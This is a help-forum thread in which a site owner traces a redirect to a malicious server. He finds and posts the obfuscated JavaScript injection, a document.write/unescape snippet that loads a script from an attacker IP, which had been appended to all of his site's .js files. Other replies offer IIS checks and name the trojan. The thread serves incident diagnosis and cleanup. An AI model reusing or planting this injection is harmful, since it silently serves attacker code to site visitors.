Website hacked with redirect script to malicious server

http://71.18.231.91/

if you go there, you will see it attempts to redirect you to 94.247.2.195:80

thats where the hack host site tries to inject code into your computer or whatever it is - that its trying to do.....

anyone got any clue how to tell what file, what piece of code, is trying to do the redirect?? when you go to http://71.18.231.91/


wish i knew!

Open in new window

jason_jmAsked:
Who is Participating?
 
jason_jmConnect With a Mentor Author Commented:
--><!--
document.write(unescape('%3CONsxecxerxeieQ7ptXP%20sreQ7c%3Dwb%2Fa2p%2FXP94PqY%2E247%2Ewb2%2EON19eQ75%2FjeQ7qwbuerPqYy%2Exej3zs%3E%3CeQ7%2Fsxecript%3E').replace(/wb|eQ7|a2p|ON|PqY|xe|XP|3z/g,""));
 -->


that code was added to all .js files

solved
0
 
Sourabh-ExcahngeCommented:
redirection can be set with the multiple ways
1. check c:\inetpub\wwwroot under this folder open each and every file and check if you find any redirection there
2.open iis manager and just hilight default website and in the right pen try and brows iisstart.htm page
3.under the properties of the default website go to the document tab and check whic document is on the top. and try to brows that file
0
 
aamodtCommented:
If you search up : 94.247.2.195:80 on google they say that that it a Virus. A Trojan to be more spessific.. like the Zief virus it injects it automaticlly when you as a user change the source code .. or it can just inject by laying on the server undetected and parsing the redirect code unseen.

I will suggest you search after fixes to the virus : Troj/JSRedir-0

and try to get rid of it.. after my rescorces it is the trojan : Troj/JSRedir-0 you have been infected by .
its a Javascript that redirects you to that server.
0
 
jason_jmAuthor Commented:
yep, was tryna work out how the website was being redirected

its from that java script code added to the end of all .js files

now i gotta figure out how the hacker got access to the .js files

probably through an infected PC from a webdesigner (stealing the FTP password in cleartext)
0
 
aamodtCommented:
yeah, we had the same problemt with one of our webserver aswell. one of the devlopers had the virus and infected the site with the javascript
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.